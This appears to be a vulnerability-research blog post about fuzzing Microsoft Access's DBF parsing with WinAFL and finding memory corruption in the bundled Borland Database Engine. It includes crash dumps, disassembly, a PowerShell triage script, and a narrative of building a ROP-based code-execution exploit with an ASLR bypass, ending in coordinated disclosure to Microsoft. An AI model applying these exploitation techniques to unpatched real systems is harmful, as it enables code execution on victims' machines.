After discovering relatively straightforward memory corruption vulnerabilities in tiny DBF parsers and Apache OpenOffice, I wanted to cast my net wider. By searching for DBF-related vulnerabilities in Microsoft's desktop database engines, I took one step towards the deep end of the fuzzing pool. I could no longer rely on source code review and dumb fuzzing; this time, I applied black-box coverage-based fuzzing with a dash of reverse engineering. My colleague Hui Yi has written several fantastic articles on fuzzing with WinAFL and DynamoRIO; I hope this article provides a practical application of those techniques to real vulnerabilities.

First, let me give you some context by diving into the history of Windows desktop database drivers.

A Quick History of Windows' Desktop Database Drivers

Following the successful release of Windows 3.0 in 1990, the number of Windows applications grew quickly. Many of these applications needed persistent storage. In those days, computer memory was limited, making it difficult for modern server-based databases like MySQL to operate. As such, the indexed sequential access method (ISAM) was developed. To put it simply, ISAM was a file-based method of database storage that included the dBase database file (DBF) format.

As the number of SQL and ISAM database formats increased, Microsoft sought to create a single, common interface for applications to communicate with these databases. In 1992, it released Open Database Connectivity (ODBC) 1.0 which supported various database formats via additional desktop database drivers. One of these drivers was Microsoft's Joint Engine Technology (Jet) engine consisting of a set of DLLs that added compatibility with different ISAM database formats. For the DBF format, Jet Engine used the Microsoft Jet xBASE ISAM driver (msxbde40.dll).

Desktop Database Drivers Architecture by Microsoft

Jet Engine DLLs

Despite this alphabet soup, both ODBC and Jet engine enjoyed widespread adoption. Many companies also wrote third-party ODBC desktop database drivers for their own proprietary database formats. The inclusion of Jet Engine in Microsoft Access ensured its longevity for more than 30 years, even though it has been largely deprecated by newer technologies such as SQL Server Express. Microsoft Office now uses the Microsoft Office Access Connectivity Engine, a fork of the Jet engine.

To add to the confusion, Microsoft released the Object Linking and Embedding, Database (OLEDB) API in 1996, which acted as a higher-level interface on top of ODBC to access an even greater range of database formats such as object databases and spreadsheets. On top of that, Microsoft released ActiveX Data Objects, an additional API to access OLEDB. Jason Roff attempted to clarify this in the following diagram:

ActiveX Database Objects

However, you might notice that the diagram misses out that ODBC can also call on the Jet Engine drivers to access non-SQL-based data sources such as DBF! This just goes to show how convoluted Microsoft's desktop database driver environment has become – even fairly authoritative sources cannot capture the full picture.

Security researchers took advantage of the age and complexity of the OLEDB/ODBC/Jet Engine architecture to discover countless memory corruption vulnerabilities. What made it more attractive was that many important Microsoft applications such as Microsoft Office and IIS rely on this stack. The most recent publication on this topic, “Give Me a SQL Injection, I Shall PWN IIS and SQL Server” presented by Palo Alto researchers at Black Hat Asia 2021, detailed many of these dependencies. In fact, the patchwork architecture was so complex that when Microsoft attempted to deprecate OLEDB in 2011, the number of breakages it caused forced Microsoft to reverse the decision six years later.

Given this context, the Jet Engine was my first port of call for hunting vulnerabilities via the DBF format.

Fuzzing Jet Engine with DBF

If you have read part one of the series, you should have a pretty good understanding of format-based dumb fuzzing. While this might be a cost-effective way of fuzzing simple targets, modern approaches apply coverage-based fuzzing. In short, these fuzzers rely on compile- or run-time instrumentation to determine which code paths have been reached in each fuzzing iteration. Based on this information, the fuzzer tries to reach as many code paths as possible to ensure proper coverage of the target. For example, let's take a simple pseudocode function:

function fuzzMe(inputFile){
    if (readLine(inputFile)[0] === opcode1) {
        runOpCode1(inputFile[1:]);
    } else if (readLine(inputFile)[0] === opcode2) {
        runOpCode2(inputFile[1:]);
    } else {
        die();
    }
}

If the fuzzer mutated the input file to match the first condition, it would know that it had reached a new code path to fuzz further. It would save that mutation (first byte matching opcode1) and continue to mutate on top of that saved mutation. This would ensure that rather than wasting time on the fall-through condition (else { die(); }), the fuzzer was reaching deeper into possibly vulnerable code in runOpCode1. This approach is incredibly powerful and most modern fuzzers are coverage-guided, including my fuzzer of choice WinAFL by Google Project Zero.
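To make the feedback loop concrete, here is a minimal sketch of a coverage-guided fuzzer in Python. It is a toy, not how WinAFL is implemented: the opcode values, the extra "deep" branch behind opcode1, and the single-byte mutator are all assumptions made for illustration, and coverage is recorded by hand rather than through instrumentation.

```python
import random

OPCODE1, OPCODE2 = 0x41, 0x42  # hypothetical opcode values


def fuzz_me(data: bytes, coverage: set) -> None:
    """Python rendering of the pseudocode target; records which branch ran."""
    if data and data[0] == OPCODE1:
        coverage.add("opcode1")
        # Hypothetical deeper path that is only reachable behind opcode1.
        if len(data) > 1 and data[1] == 0xFF:
            coverage.add("opcode1-deep")
    elif data and data[0] == OPCODE2:
        coverage.add("opcode2")
    else:
        coverage.add("die")


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Overwrite one randomly chosen byte with a random value."""
    buf = bytearray(data)
    buf[rng.randrange(len(buf))] = rng.randrange(256)
    return bytes(buf)


def fuzz(seed: bytes, iterations: int, rng: random.Random):
    """Keep any input that reaches a branch not seen before and mutate on top of it."""
    corpus = [seed]
    seen = set()
    fuzz_me(seed, seen)
    for _ in range(iterations):
        candidate = mutate(rng.choice(corpus), rng)
        hit = set()
        fuzz_me(candidate, hit)
        if not hit <= seen:  # new code path: save this mutation
            seen |= hit
            corpus.append(candidate)
    return corpus, seen


corpus, seen = fuzz(b"\x00\x00", 50000, random.Random(0))
print(sorted(seen))
print([entry.hex() for entry in corpus])
```

The "opcode1-deep" branch needs two specific bytes, which a single-byte mutator can only reach because the intermediate input (first byte matching opcode1) was saved to the corpus first.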

Since instrumentation is a computationally expensive operation, coverage-based fuzzers should run on a harness. Imagine a large office application that loads a xyzFormat module and runs the xyzFormat.openXyz function whenever it opens an XYZ file. We could fuzz this by using the large office application to open mutated XYZ files repeatedly, but this would be extremely time- and resource-intensive with coverage-guidance instrumentation. Instead, why not write our own mini-program, or harness, to import the xyzFormat module and run the xyzFormat.openXyz function directly? This would involve reverse-engineering the function call and feeding the right inputs, but greatly speed up fuzzing. There's a lot more to discuss here, but if you want a quick guide on coverage-based fuzzing with WinAFL, check out Hui Yi's blogpost.

As I mentioned, fuzzing Jet Engine was a well-travelled path. After consulting the Palo Alto researchers, I decided to build a harness based on the Microsoft OLE DB Provider for Microsoft Jet. The researchers noted that opening the mutated files and executing a few simple queries were sufficient for a successful harness. Hence, I used the CDataSource and CCommand classes as described in Microsoft's OLEDB programming documentation to open the mutated file (CDataSource.OpenFromInitializationString/CSession.Open), execute a select all query (CCommand.Open), retrieve the column information (CCommand.GetColumnInfo), and finally iterate through the row data (CCommand.GetString). In turn, these OLEDB functions depended on the Microsoft Jet OLEDB provider (msjetoledb40.dll) which used Jet Engine (msjet40.dll).

Here, I hit a roadblock. Even though I could fuzz Jet Engine via OLEDB using the Microsoft.Jet.OLEDB.4.0 connection string, I faced many difficulties setting up Jet Engine on my fuzzing environment. Jet Engine was deprecated and did not interact well with my updated environment. After a bit of tinkering, I decided to switch targets and fuzz the Microsoft Access database engine (acecore.dll) via the Microsoft Access OLEDB Provider (aceoledb.dll) instead. To parse a DBF file, the Access database engine would call on its own xBASE ISAM (acexbe.dll). Since my ultimate target was Microsoft Office, it made sense to fuzz the Access Database Engine instead of Jet Engine. Furthermore, since DBF support was removed, then added back to Access in 2016, there was a chance that some interesting code could have been included. Thus, I switched to the Microsoft.ACE.OLEDB.12.0 connection string.

Next, I minimised the DBF sample corpus with winafl-cmin.py, which selected the smallest set with the greatest possible coverage. Finally, I could start my fuzzer! Or rather, my fuzzers – I ran twelve instances simultaneously thanks to WinAFL's parallel fuzzing support.
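The idea behind corpus minimisation can be sketched as a greedy set cover. This is only an illustration of the concept and not necessarily what winafl-cmin.py does internally; the file names, sizes, and branch labels below are hypothetical.

```python
def minimise_corpus(coverage_by_file: dict, sizes: dict) -> list:
    """Greedily pick files until every observed branch is covered.

    At each step, choose the file that adds the most uncovered branches,
    preferring the smaller file when two candidates add the same number.
    """
    remaining = set().union(*coverage_by_file.values())
    chosen = []
    while remaining:
        best = max(
            coverage_by_file,
            key=lambda name: (len(coverage_by_file[name] & remaining), -sizes[name]),
        )
        chosen.append(best)
        remaining -= coverage_by_file[best]
    return chosen


# Hypothetical coverage data: which branches each sample file reaches.
coverage_by_file = {
    "a.dbf": {"b1", "b2"},
    "b.dbf": {"b2"},
    "c.dbf": {"b3", "b4"},
    "d.dbf": {"b1", "b3"},
}
sizes = {"a.dbf": 100, "b.dbf": 50, "c.dbf": 60, "d.dbf": 500}

kept = minimise_corpus(coverage_by_file, sizes)
print(kept)
```

Here two of the four files are enough to reach every branch, so the other two would only slow the fuzzer down.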

The Mystery of the Ghost Crashes

As the fuzzers worked in the background, I continued researching other office applications that parsed DBF files. No crashes occurred immediately, but I figured that this was normal since my fuzzing machine was rather slow. This continued for several days, until I checked one morning and found a bunch of crashes!

WinAFL Fuzzing

WinAFL saved the mutated file that caused each crash in the crashes folder with the error in the filename, such as EXCEPTION_ACCESS_VIOLATION.

WinAFL Crashes

To reproduce the vulnerability, I downloaded the crashing files to a virtual machine with the same OLEDB and Microsoft Access database engine environment, then opened the files with the harness. However, the crash no longer occurred! Even when I inspected the harness execution with WinDBG, nothing stood out; the harness opened and parsed the mutated DBF file without any issues.

What was going on?

I went back to the fuzzing machine and ran the harness with the crashing files. No error.

After much head scratching, I attributed it to a false positive and returned to researching other office applications while the fuzzers continued to run. Meanwhile, the crashes stopped occurring.

A few hours later, the same thing happened! Confused, I checked the files on my fuzzing machine; this time, they managed to crash the harness.

I began to put two and two together. There had to be some difference between the fuzzing machine and the debugging machine that caused the discrepancy. After a few hours of painstaking debugging, I made a discovery: one of the office applications I had installed on my fuzzing machine as part of my research appeared to be causing the crashes.

When I uninstalled the office application (which will remain unnamed), the crashes stopped. When I re-installed it, the mutated files crashed the harness again.

Digging deeper, I ran a stack trace on the crash:

0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00f7e360 10e57fc8 IDAPI32!ImltCreateTable2+0x3c6b
01 00f7e38c 67940c19 IDAPI32!DbiOpenTableList+0x31
02 00f7e888 67947046 ACEXBE+0x10c19
03 00f7f110 6794a520 ACEXBE+0x17046
04 00f7f140 6794a295 ACEXBE+0x1a520
05 00f7f15c 5daf71ae ACEXBE+0x1a295
06 00f7f184 5db421cb ACECORE+0x171ae
07 00f7f2c8 5db22f1e ACECORE+0x621cb
08 00f7f360 5db224fe ACECORE+0x42f1e
09 00f7f51c 5db21f8d ACECORE+0x424fe
0a 00f7f640 5db20db2 ACECORE+0x41f8d

The crash occurred in IDAPI32, which was called by ACEXBE (remember that this is the Microsoft Access xBASE ISAM). Where had this come from? A quick Google for “IDAPI32” revealed that this library was the “Borland Database Engine library”. Huh? Puzzled, I checked the path to the library: c:\Program Files\Common Files\Borland Shared\BDE\IDAPI32.DLL.

Then, it clicked. The unnamed office application had installed the Borland Database Engine (BDE) as a dependency. Somehow, once this was installed, the Microsoft Access database engine xBASE ISAM switched to BDE to parse the DBF files. How did this happen?

Looking through the disassembled code of ACEXBE in IDA Pro, I discovered where it loaded IDAPI32:

.text:1000E1B3 sub_1000E1B3    proc near               ; CODE XREF: sub_1000F82F:loc_1000F9DD↓p
.text:1000E1B3
.text:1000E1B3 Type            = dword ptr -428h
.text:1000E1B3 cbData          = dword ptr -424h
.text:1000E1B3 phkResult       = dword ptr -420h
.text:1000E1B3 Destination     = word ptr -41Ch
.text:1000E1B3 Data            = word ptr -210h
.text:1000E1B3 var_4           = dword ptr -4
.text:1000E1B3
.text:1000E1B3                 push    ebp
.text:1000E1B4                 mov     ebp, esp
.text:1000E1B6                 sub     esp, 428h
.text:1000E1BC                 mov     eax, ds:dword_10037408
.text:1000E1C1                 xor     eax, ebp
.text:1000E1C3                 mov     [ebp+var_4], eax
.text:1000E1C6                 push    edi
.text:1000E1C7                 lea     eax, [ebp+phkResult]
.text:1000E1CD                 push    eax             ; phkResult
.text:1000E1CE                 push    20019h          ; samDesired
.text:1000E1D3                 push    0               ; ulOptions
.text:1000E1D5                 push    offset SubKey   ; "Software\\Borland\\Database Engine"
.text:1000E1DA                 push    80000002h       ; hKey
.text:1000E1DF                 call    ds:RegOpenKeyExW
.text:1000E1E5                 test    eax, eax
.text:1000E1E7                 jz      short loc_1000E1F0
.text:1000E1E9                 xor     eax, eax
.text:1000E1EB                 jmp     loc_1000F54A
...
.text:1000E28E loc_1000E28E:                           ; CODE XREF: sub_1000E1B3+13E↓j
.text:1000E28E                 push    edi             ; SizeInWords
.text:1000E28F                 lea     eax, [ebp+Destination]
.text:1000E295                 push    eax             ; Destination
.text:1000E296                 push    esi             ; Source
.text:1000E297                 call    sub_10007876
.text:1000E29C                 mov     eax, ebx
.text:1000E29E                 sub     eax, esi
.text:1000E2A0                 and     eax, 0FFFFFFFEh
.text:1000E2A3                 cmp     eax, 20Ah
.text:1000E2A8                 jnb     loc_1000F559
.text:1000E2AE                 xor     ecx, ecx
.text:1000E2B0                 mov     [ebp+eax+Destination], cx
.text:1000E2B8                 lea     eax, [ebp+Destination]
.text:1000E2BE                 push    edi
.text:1000E2BF                 push    eax
.text:1000E2C0                 push    offset aIdapi32Dll ; "\\IDAPI32.DLL"
.text:1000E2C5                 call    Mso20Win32Client_1065

It appeared that the Access xBase ISAM included a hard-coded check for the BDE registry key (Software\Borland\Database Engine under HKEY_LOCAL_MACHINE, which is what the 80000002h handle refers to) and would load BDE's IDAPI32.DLL if it existed! Since BDE was a long-deprecated library, with the last version released in 2001 according to the Wayback Machine, this was a classic example of CWE-1104: Use of Unmaintained Third Party Components. There were undoubtedly numerous vulnerabilities left over in this classic piece of software that led to the crashes.
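The control flow in the disassembly can be modelled roughly as follows. This is a sketch under assumptions: the part of the routine that reads the directory out of the key is elided in the listing, so it is represented here by a hypothetical read_bde_directory callable rather than a real registry call. Only the constants and the two strings are taken from the listing.

```python
# Constants pushed before RegOpenKeyExW in the listing.
HKEY_LOCAL_MACHINE = 0x80000002  # hKey
KEY_READ = 0x20019               # samDesired
SUBKEY = r"Software\Borland\Database Engine"
LIBRARY_SUFFIX = r"\IDAPI32.DLL"


def locate_bde_library(read_bde_directory):
    """Return the IDAPI32.DLL path to load, or None if BDE is not installed.

    read_bde_directory is a hypothetical stand-in for the elided registry
    read: it receives (hive, subkey, access) and returns the BDE directory
    as a string, or None when the key cannot be opened.
    """
    directory = read_bde_directory(HKEY_LOCAL_MACHINE, SUBKEY, KEY_READ)
    if directory is None:
        # Mirrors the early exit taken when RegOpenKeyExW returns non-zero.
        return None
    return directory + LIBRARY_SUFFIX


# Machine without BDE: the key does not exist.
print(locate_bde_library(lambda hive, subkey, access: None))

# Machine where another application installed BDE as a dependency.
bde_dir = r"c:\Program Files\Common Files\Borland Shared\BDE"
print(locate_bde_library(lambda hive, subkey, access: bde_dir))
```

This matches the behaviour observed on the two machines: the same harness and the same file took a different parsing path depending only on whether the registry key was present.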

I have explained the technical reason for the crashes. However, to understand how an almost thirty-year-old library ended up in the code of the Microsoft Office Access Database engine, we need to understand the history of the Borland Database Engine.

A Quick History of the Borland Database Engine

In the 1980s, dBase was one of the first tools used by early software developers to build applications. Comprising a database engine and its own programming language, it grew massively due to its first-mover advantage and inspired legions of copycats such as FoxPro. A competing dBase standard called “xBase” was created to distinguish itself from dBase's proprietary technology. Many consumer applications back then were written using dBase tools and its derivatives.

In 1991, then-software giant Borland acquired Ashton-Tate, the owner of dBase. However, competition was heating up with an upstart company named Microsoft, which acquired FoxPro and launched its own Microsoft Access database engine. To shore up its product line-up, Borland also acquired WordPerfect, eventually launching its own Borland Office suite that included DBF compatibility.

Over time, Borland failed to keep up with Microsoft as it was forced to adapt to constant changes in the very platform it was developing for – Windows. Eventually, dBase, WordPerfect, and other core Borland products ended up being sold in pieces to various companies. By 2009, Borland was finished – acquired by Micro Focus for $75 million, a shadow of its former self. It's hard to win a war on your opponent's turf.

However, the deep impact dBase made in early software development continues today. After all, Microsoft Access still includes a legacy xBase ISAM engine. Even the choice of “xBase” instead of “dBase” reflects the cutthroat corporate wars of the past.

Big Database Energy

Back to the Borland Database Engine itself. When I realised the crashes were occurring in the IDAPI32 library, I decided that it would be better to fuzz the IDAPI32 library functions such as DbiOpenTableList and ImltCreateTable2 directly instead of via the high-level OLEDB API. Thankfully, there are still a few tutorials and code snippets online that demonstrate how to call BDE functions to read a DBF file. I had to import several custom structs to support the harness, which ran dbiOpenTable and dbiGetNextRecord to open and parse the database. This removed a lot of the processing overhead of the OLEDB API and allowed me to pinpoint crashes more accurately.

As the crashes stacked up, it was time to triage them. Unlike Peach Fuzzer, WinAFL did not have a convenient triaging helper, but I could easily recreate it using the WinDBG command line interface and PowerShell:

# Replay every crashing input under WinDBG and log the !exploitable verdict.
Get-ChildItem "C:\Users\fuzzer\Desktop\crashes" -Filter *.dbf |
ForEach-Object {
      # $($_.Name) forces the property to be expanded inside the quoted log path.
      & 'C:\Program Files\Windows Kits\10\Debuggers\x86\windbg.exe' -g -logo "C:\Users\fuzzer\Desktop\windbglogs\$($_.Name).log" -c '.load exploitable;!exploitable;!exchain;q' C:\Users\fuzzer\Desktop\BDEHarness\BDEHarness.exe $_.FullName | Out-Null
}

The script iterated through all the crash files, ran them using the harness in WinDBG, then generated a log file containing the !exploitable output. Next, I focused on the EXPLOITABLE crashes and grouped the ones that had the same crashing instructions.
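The grouping step can also be scripted. Below is a minimal sketch that assumes each log contains an "Exploitability Classification: ..." line from !exploitable and a faulting location line in the module!symbol+offset: form that WinDBG prints above the crashing instruction. The sample log contents are hypothetical and heavily trimmed.

```python
import re
from collections import defaultdict

# Assumed log shapes; adjust the patterns to match the real log files.
CLASS_RE = re.compile(r"Exploitability Classification: (\w+)")
SITE_RE = re.compile(r"^(\w+!\w+\+0x[0-9a-fA-F]+):$", re.MULTILINE)


def group_exploitable(logs: dict) -> dict:
    """Map each faulting location to the EXPLOITABLE logs that crashed there."""
    groups = defaultdict(list)
    for name, text in logs.items():
        classification = CLASS_RE.search(text)
        site = SITE_RE.search(text)
        if classification and classification.group(1) == "EXPLOITABLE" and site:
            groups[site.group(1)].append(name)
    return dict(groups)


# Hypothetical, trimmed log contents keyed by log file name.
logs = {
    "crash1.dbf.log": "IDAPI32!ImltCreateTable2+0x3c6b:\n"
                      "Exploitability Classification: EXPLOITABLE\n",
    "crash2.dbf.log": "IDAPI32!ImltCreateTable2+0x3c6b:\n"
                      "Exploitability Classification: EXPLOITABLE\n",
    "crash3.dbf.log": "IDDBAS32!BL_Exit+0x102:\n"
                      "Exploitability Classification: PROBABLY_NOT_EXPLOITABLE\n",
}

groups = group_exploitable(logs)
for site, names in groups.items():
    print(site, names)
```

In practice the dictionary would be filled by reading each file in the windbglogs folder instead of using inline strings.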

Right off the bat, two crashes stood out to me.

The Second Order EIP Overwrite

The first crash looked like this:

0:000> r
eax=29ae1de1 ebx=00000000 ecx=1c3be2dc edx=015531a0 esi=1c3bfa4c edi=01553c1c
eip=1bd2f8cd esp=01552e54 ebp=01553808 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
IDAPI32!ImltCreateTable2+0x3c6b:
1bd2f8cd ff10            call    dword ptr [eax]      ds:0023:29ae1de1=????????

This was extremely promising because it looked like I had overwritten the EAX register, which was then used in a call instruction. This meant that I could control the execution flow by changing which address the program would jump to. Just like in my dumb fuzzing workflow, I created a β€œminimal viable crash” to pinpoint the source of the overwritten EAX bytes.

However, even after minimising the file to the essential few bytes, I realised that none of the bytes in my mutated file matched the overwritten EAX! This was strange, so I searched the application memory for 29ae1de1 to trace back to its source. I realised that these bytes appeared to be coming from the same region of memory but varied based on the value of lengthOfEachRecord in my file.

If you recall from part one, the format of the DBF header looks like this:

struct DBF {
	struct HEADER {
		char version;
		struct DATE_OF_LAST_UPDATE {
			char yy <read=yearFrom1900,format=decimal>;
			char mm <format=decimal>;
			char dd <format=decimal>;
		} DateOfLastUpdate;
		ulong	numberOfRecords;
		ushort	lengthOfHeaderStructure;
		ushort	lengthOfEachRecord;
		char	reserved[2];
		char	incompleteTrasaction <format=decimal>;
		char	encryptionFlag <format=decimal>;
		int	freeRecordThread;
		int	reserved1[2];
		char	mdxFlag <format=decimal>;
		char	languageDriver <format=decimal>;
		short	reserved2;
	} header;

Based on the minimal viable crash, the overflow occurred due to an arbitrarily large lengthOfEachRecord, which caused an oversized memcpy later. In turn, the last byte of lengthOfEachRecord changed the address of the value that EAX was later overwritten with.
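For readers who want to inspect these fields in their own samples, the 32-byte header described by the template can be unpacked with Python's struct module. This is a sketch: the field names mirror the template above (including its spelling), the char fields are treated as unsigned bytes, and the sample header is fabricated for illustration rather than taken from a crashing file.

```python
import struct
from collections import namedtuple

# Little-endian, no padding: 1 + 3 + 4 + 2 + 2 + 2 + 1 + 1 + 4 + 8 + 1 + 1 + 2 = 32 bytes.
HEADER_FORMAT = "<B3BIHH2sBBi8sBB2s"

DbfHeader = namedtuple(
    "DbfHeader",
    "version yy mm dd numberOfRecords lengthOfHeaderStructure lengthOfEachRecord "
    "reserved incompleteTrasaction encryptionFlag freeRecordThread reserved1 "
    "mdxFlag languageDriver reserved2",
)


def parse_header(data: bytes) -> DbfHeader:
    """Unpack the fixed-size DBF header from the start of a file."""
    size = struct.calcsize(HEADER_FORMAT)
    return DbfHeader(*struct.unpack(HEADER_FORMAT, data[:size]))


# Fabricated header with an oversized record length (bytes 08 FE on disk).
sample = struct.pack(
    HEADER_FORMAT,
    0x03, 121, 6, 25,   # version, then yy (years since 1900), mm, dd
    1, 65, 0xFE08,      # numberOfRecords, lengthOfHeaderStructure, lengthOfEachRecord
    b"\x00\x00", 0, 0, 0, b"\x00" * 8, 0, 0, b"\x00\x00",
)

header = parse_header(sample)
print(hex(header.lengthOfEachRecord))
print(sample[10:12].hex())
```

Because the field is little-endian, the two bytes at offsets 10 and 11 appear on disk in the opposite order to how the 16-bit value is written in hex.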

Here's a helpful graphic to illustrate this point(er).

Second Order Overwrite

However, it appeared that the crash only occurred within a certain range of values of lengthOfEachRecord. By painstakingly incrementing the last byte, I enumerated these values:

lengthOfEachRecord   EAX Source Address   EAX
08 FE                106649b6             46424400
18 FE                106649c6             41424400
28 FE                106649d6             45534142
38 FE                106649e6             3b003745
48 FE                106649f6             595e1061
58 FE                10664a06             53091061
68 FE                10664a16             00000000
78 FE                10664a26             60981061
88 FE                10664a36             ab391061
98 FE                10664a46             5c450000
A8 FE                10664a56             65b81061
B8 FE                10664a66             a7b40000
C8 FE                10664a76             00000000
D8 FE                10664a86             6f0e1061
E8 FE                10664a96             29ae1061
F8 FE                10664aa6             80781061
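The enumerated values follow a simple pattern: the EAX source address moves in lockstep with the byte that varies in lengthOfEachRecord. A quick check in Python, using only the numbers from the table, confirms that every row fits "fixed base plus varying byte"; the base itself is derived from the first row and is an inference, not something read out of the debugger.

```python
# (varying byte of lengthOfEachRecord, EAX source address) from the table.
rows = [
    (0x08, 0x106649B6), (0x18, 0x106649C6), (0x28, 0x106649D6), (0x38, 0x106649E6),
    (0x48, 0x106649F6), (0x58, 0x10664A06), (0x68, 0x10664A16), (0x78, 0x10664A26),
    (0x88, 0x10664A36), (0x98, 0x10664A46), (0xA8, 0x10664A56), (0xB8, 0x10664A66),
    (0xC8, 0x10664A76), (0xD8, 0x10664A86), (0xE8, 0x10664A96), (0xF8, 0x10664AA6),
]

# Derive the implied base from the first row, then test it against all rows.
base = rows[0][1] - rows[0][0]
consistent = all(address == base + byte for byte, address in rows)

print(hex(base), consistent)
```

In other words, the file only selects an offset within a fixed window of memory that the attacker does not otherwise control.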

To get my desired code execution, I needed to ensure that the pointer overwrite chain ended at attacker-controlled bytes. I checked each of the potential values of EAX for useful addresses. Unfortunately, none of them pointed to attacker-controlled bytes; while some pointed to unoccupied memory addresses, the rest pointed to other sections of unusable code. I tried overflowing into some of these addresses, but the bytes wrapped around in a way that prevented this from happening. Perhaps the area of memory that contained the possible EAX source addresses was written after the initial overflow.

In the end, I gave up this promising lead as it only caused an indirect execution control at best. On to the next.

The Write-What-Where Gadget

The second crash looked like this:

(26ac.26b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000008 edx=00000021 esi=6bde36dc edi=00490000
eip=4de39db2 esp=00b4d31c ebp=00b4d324 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
IDDBAS32!BL_Exit+0x102:
4de39db2 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00b4d324 4de00cd8 IDDBAS32!BL_Exit+0x102
01 00b4d344 4de019f6 IDDBAS32!XDrvInit+0x1fb7c
02 00b4d370 4ddfc2a9 IDDBAS32!XDrvInit+0x2089a
03 00b4d4d0 4ddee2cd IDDBAS32!XDrvInit+0x1b14d
04 00b4d9d0 4dde2758 IDDBAS32!XDrvInit+0xd171
05 00b4da0c 4bdff194 IDDBAS32!XDrvInit+0x15fc
06 00b4dcc0 4bde5019 IDAPI32!ImltCreateTable2+0x3532
07 00b4de18 79587bb3 IDAPI32!DbiOpenTable+0xcd

At first glance, this appeared less promising than the EIP overwrite. The references to [edi] and [esi] suggested that indirect addressing would be necessary, and rep movs seemed like a cumbersome instruction to deal with.

On closer inspection, however, I realised that this was one of the most powerful memory corruption gadgets: a write-what-where. The rep movs instruction copies ECX doublewords (four bytes each) from the address in ESI to the address in EDI. After creating my minimal viable crash, I found that ESI, EDI, and ECX were all controllable via bytes in the payload file, so I could write arbitrary bytes anywhere in memory!
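To see why control over these three registers amounts to a write-what-where, here is a small Python simulation of rep movs on doublewords with the direction flag clear. The flat bytearray standing in for process memory, the addresses, and the payload bytes are all hypothetical.

```python
def rep_movsd(memory: bytearray, esi: int, edi: int, ecx: int) -> None:
    """Copy ecx doublewords from memory[esi:] to memory[edi:], lowest address first."""
    for _ in range(ecx):
        if esi + 4 > len(memory) or edi + 4 > len(memory):
            # Stand-in for the access violation raised on unmapped memory.
            raise MemoryError("access violation")
        memory[edi:edi + 4] = memory[esi:esi + 4]
        esi += 4
        edi += 4


memory = bytearray(64)
memory[0:8] = b"AAAABBBB"   # "what": attacker-supplied bytes from the file
target = 32                  # "where": hypothetical saved return pointer slot

rep_movsd(memory, esi=0, edi=target, ecx=2)
print(memory[target:target + 8])
```

ESI chooses what is copied, EDI chooses where it lands, and ECX chooses how much, which is exactly the set of values the payload file controlled.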

The minimal viable crash also underscored the strength of coverage-guided fuzzing. To reach this crashing instruction, fieldName must be set to \x00 to trigger the buffer overflow by causing a copy of the rest of the payload bytes into a zero-length string buffer. On top of that, two other bytes corresponding to the languageDriver byte in the header and an offset in the body had to be set to specific values to reach the crash. This was a hallmark of coverage-guided fuzzing: discovering and eventually crashing edge-case conditions in a complex codebase.

Now that I could write arbitrary bytes to memory, the next step was to execute my own code. Thankfully, given the age of the IDDBAS32 library, it was compiled without any memory protections like Data Execution Prevention (DEP) or Address Space Layout Randomisation (ASLR). As such, I could build a straightforward Return-Oriented Programming (ROP) chain exploit that overwrote a fixed return pointer after the malicious overwrite, then worked its way through GetModuleHandleA > GetProcAddress > WinExec.

With the new payload, my harness executed the overwrite and popped Calc.exe without a hitch. Filled with excitement, I opened Microsoft Office Access and added the payload as an external database. It crashed... with no Calculator. What happened?

As it turned out, even though IDDBAS32 was compiled without memory protections, Microsoft Office has enabled Forced ASLR since 2013, which adds address randomisation to loaded libraries even if they were not compiled with it. This stumped quite a few adversaries in the past, such as this CVE-2017-11826 exploit sample analysed by McAfee researchers. In my case, since the addresses of IDDBAS32 were randomised, my exploit was sending the instruction pointer to random addresses instead of the start of my ROP chain.

In such cases where you can no longer rely on non-ASLR modules, the only option is to leak addresses through a memory read gadget. This is much easier to do in a scripting context like JavaScript for a browser exploit. You can run the memory address leak exploit first before your memory write exploit. When opening a database or document in Microsoft Office, however, your options become a lot more limited unless you rely on macros, which is not the ideal exploit scenario. Fortunately, CVE-2021-40444 also highlighted another scripting environment in Office: ActiveX. As another researcher noted on Twitter, this creates another path to bypass ASLR by loading stripped DLLs.
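The effect of Forced ASLR on a hard-coded chain, and the reason a leak fixes it, comes down to simple arithmetic. The sketch below uses made-up base addresses and gadget offsets; none of these values come from IDDBAS32.

```python
def build_chain(module_base: int, gadget_offsets: list) -> list:
    """Turn module-relative gadget offsets into absolute addresses."""
    return [module_base + offset for offset in gadget_offsets]


# All values below are hypothetical.
GADGET_OFFSETS = [0x1234, 0x5678, 0x9ABC]
ASSUMED_BASE = 0x4DDE0000      # base observed in the standalone harness
RANDOMISED_BASE = 0x6A310000   # base chosen by Forced ASLR in the real target

hardcoded = build_chain(ASSUMED_BASE, GADGET_OFFSETS)
needed = build_chain(RANDOMISED_BASE, GADGET_OFFSETS)
print([hex(a) for a in hardcoded])
print([hex(a) for a in needed])

# With a leaked pointer to a known offset inside the module, the real base
# can be recovered and the chain rebuilt.
KNOWN_OFFSET = 0x2000
leaked_pointer = RANDOMISED_BASE + KNOWN_OFFSET
recovered_base = leaked_pointer - KNOWN_OFFSET
rebuilt = build_chain(recovered_base, GADGET_OFFSETS)
print(rebuilt == needed)
```

Every address in the hard-coded chain is off by the same slide, so a single leaked pointer is enough to correct all of them.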

Regardless of your choice of ASLR bypass, once the addresses are correctly aligned, the exploit runs on Access smoothly:

POC

With the exploit completed, I reported the vulnerability to the Microsoft Security Response Center.

  • 25 June: Initial disclosure
  • 7 July: Case opened
  • 16 July: Vulnerability confirmed
  • 14 September: Fix released (Patch Tuesday)
  • 18 September: Public Disclosure

Conclusion

The dBase vulnerability was an accidental find that surfaced from the depths of computing history. (Un)surprisingly, a thirty-year-old format continues to cause problems in modern applications. Even though the Borland Database Engine was deprecated decades ago, some software manufacturers continue to package it as a dependency, exposing users to old vulnerabilities. The engine is no longer updated and should not be used in software.

